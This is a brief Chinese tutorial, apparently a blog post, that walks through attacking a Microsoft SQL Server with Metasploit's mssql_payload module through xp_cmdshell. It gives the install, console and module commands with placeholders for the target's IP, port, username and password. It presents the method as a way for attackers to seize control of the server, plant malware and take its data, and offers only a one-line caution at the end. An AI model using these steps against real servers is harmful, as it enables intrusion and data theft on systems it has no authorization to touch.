MSSQL 通过 Metasploit 提权的漏洞利用（mssql msf 提权）

MSSQL提权漏洞利用能够帮助攻击者获取到更高权限来攻击被攻击系统，通过这种攻击方式可以轻松访问受保护的数据以及系统资源。这种攻击方式也可以帮助攻击者把脚本或者恶意程序植入受攻击系统从而可以控制、监控或者掠夺各类资源。 对MSSQL，有多种提权漏洞可以利用，下面就介绍其中之一通过Metasploit利用的MSSQL漏洞。

Metasploit提供的mssql_payload可以轻松的利用mssql的xp_cmdshell函数来在MSSQL服务器上运行一个可执行文件,从而达到提权的目的。

首先在Kali Linux中安装 Metasploit 工具,打开终端,输入以下代码安装 Metasploit:

 apt-get install metasploit-framework

安装完成后输入以下命令进入msfconsole：

 msfconsole

输入以下代码来使用mssql_payload进行攻击：

use exploit/windows/mssql/mssql_payload 
set RHOST IP
set RPORT port
set USERNAME username
set PASSWORD password
exploit

其中IP，port，username，password分别填入mssql服务器的ip地址，端口，用户名和密码，以实现提权。

使用mssql_payload后会攻击成功。在这种情况下，攻击者就可以对服务器进行控制，并可以获取服务器上的所有数据。

总之，mssql_payload能够轻松的利用mssql的XP_CMDSHELL函数，达到提权的目的，但这种方法有很高的风险，因此，在实施之前请仔细考虑，避免给服务器带来损失。